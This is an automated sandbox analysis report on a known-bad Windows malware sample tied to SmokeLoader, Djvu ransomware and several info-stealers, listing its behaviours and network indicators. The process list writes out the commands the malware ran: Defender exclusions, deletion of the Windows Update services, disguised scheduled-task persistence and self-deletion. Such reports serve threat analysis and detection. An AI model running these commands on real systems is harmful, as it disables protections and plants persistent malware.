Analysis Overview
SHA256
dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967
Threat Level: Known bad
The file dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967 was found to be: Known bad.
Malicious Activity Summary
SmokeLoader
Vidar
Suspicious use of NtCreateUserProcessOtherParentProcess
Djvu Ransomware
Detected Djvu ransomware
Raccoon
Amadey
Lumma Stealer
Modifies security service
Stops running service(s)
Downloads MZ/PE file
Modifies file permissions
Reads user/profile data of web browsers
Deletes itself
Reads user/profile data of local email clients
Loads dropped DLL
VMProtect packed file
Executes dropped EXE
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Checks installed software on the system
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Checks processor information in registry
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: MapViewOfSection
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-04-25 09:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-25 09:34
Reported
2023-04-25 09:37
Platform
win10-20230220-en
Max time kernel
151s
Max time network
148s
Command Line
Signatures
Amadey
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Lumma Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
Raccoon
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2848 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2848 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2848 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2848 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2848 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
Vidar
Downloads MZ/PE file
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\256A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\256A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\cc3c16d1-0a6a-40b1-8a83-03a5c769f412\\2879.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\2879.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\ProgramData\24035804214954848532.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\5005.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\CC99.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\CEFB.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\CEFB.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\CEFB.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\256A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\256A.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CEFB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\24035804214954848532.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe
"C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe"
C:\Users\Admin\AppData\Local\Temp\256A.exe
C:\Users\Admin\AppData\Local\Temp\256A.exe
C:\Users\Admin\AppData\Local\Temp\2720.exe
C:\Users\Admin\AppData\Local\Temp\2720.exe
C:\Users\Admin\AppData\Local\Temp\2879.exe
C:\Users\Admin\AppData\Local\Temp\2879.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\2879.exe
C:\Users\Admin\AppData\Local\Temp\2879.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\cc3c16d1-0a6a-40b1-8a83-03a5c769f412" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\2879.exe
"C:\Users\Admin\AppData\Local\Temp\2879.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\2879.exe
"C:\Users\Admin\AppData\Local\Temp\2879.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe
"C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe"
C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe
"C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe"
C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build3.exe
"C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\ProgramData\24035804214954848532.exe
"C:\ProgramData\24035804214954848532.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\256A.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1904
C:\Users\Admin\AppData\Local\Temp\BFF7.exe
C:\Users\Admin\AppData\Local\Temp\BFF7.exe
C:\Users\Admin\AppData\Local\Temp\C1DD.exe
C:\Users\Admin\AppData\Local\Temp\C1DD.exe
C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
C:\Users\Admin\AppData\Local\Temp\C48D.exe
C:\Users\Admin\AppData\Local\Temp\C48D.exe
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Users\Admin\AppData\Local\Temp\C48D.exe
C:\Users\Admin\AppData\Local\Temp\C48D.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
C:\Users\Admin\AppData\Local\Temp\C48D.exe
"C:\Users\Admin\AppData\Local\Temp\C48D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\C48D.exe
"C:\Users\Admin\AppData\Local\Temp\C48D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe
"C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe"
C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe
"C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe"
C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build3.exe
"C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Users\Admin\AppData\Local\Temp\5005.exe
C:\Users\Admin\AppData\Local\Temp\5005.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 788
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
C:\Users\Admin\AppData\Local\Temp\CC99.exe
C:\Users\Admin\AppData\Local\Temp\CC99.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 780
C:\Users\Admin\AppData\Local\Temp\CEFB.exe
C:\Users\Admin\AppData\Local\Temp\CEFB.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 104.21.18.99:80 | potunulit.org | tcp |
| US | 52.182.143.208:443 | tcp | |
| US | 8.8.8.8:53 | 99.18.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | leaderspro.ps | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| US | 8.8.8.8:53 | 14.242.73.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| EE | 91.235.234.235:80 | tcp | |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 254.217.0.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.220.83:11111 | 116.203.220.83 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.220.203.116.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | colisumy.com | udp |
| MX | 187.212.177.109:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | zexeq.com | udp |
| KR | 211.171.233.129:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | 109.177.212.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.233.171.211.in-addr.arpa | udp |
| KR | 211.171.233.129:80 | zexeq.com | tcp |
| US | 209.197.3.8:80 | tcp | |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 176.25.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.55.52.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fakethedead.com | udp |
| BZ | 78.142.29.185:443 | fakethedead.com | tcp |
| US | 8.8.8.8:53 | 185.29.142.78.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.2.149:11111 | 116.203.2.149 | tcp |
| US | 8.8.8.8:53 | 149.2.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.77.109.52.in-addr.arpa | udp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| US | 8.8.8.8:53 | bz.bbbeioaag.com | udp |
| HK | 103.100.211.218:80 | bz.bbbeioaag.com | tcp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| AT | 77.73.134.27:80 | 77.73.134.27 | tcp |
| US | 8.8.8.8:53 | 27.134.73.77.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| MX | 187.212.177.109:80 | colisumy.com | tcp |
| US | 82.117.255.127:80 | 82.117.255.127 | tcp |
| KR | 211.171.233.129:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | 127.255.117.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | adsmanager.facebook.com | udp |
| US | 8.8.8.8:53 | bz.bbbeioaag.com | udp |
| US | 8.8.8.8:53 | 50.4.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | adsmanager.facebook.com | udp |
| US | 157.240.5.12:443 | adsmanager.facebook.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| DE | 157.240.20.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 12.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | count.iiagjaggg.com | udp |
| HK | 154.221.31.191:80 | count.iiagjaggg.com | tcp |
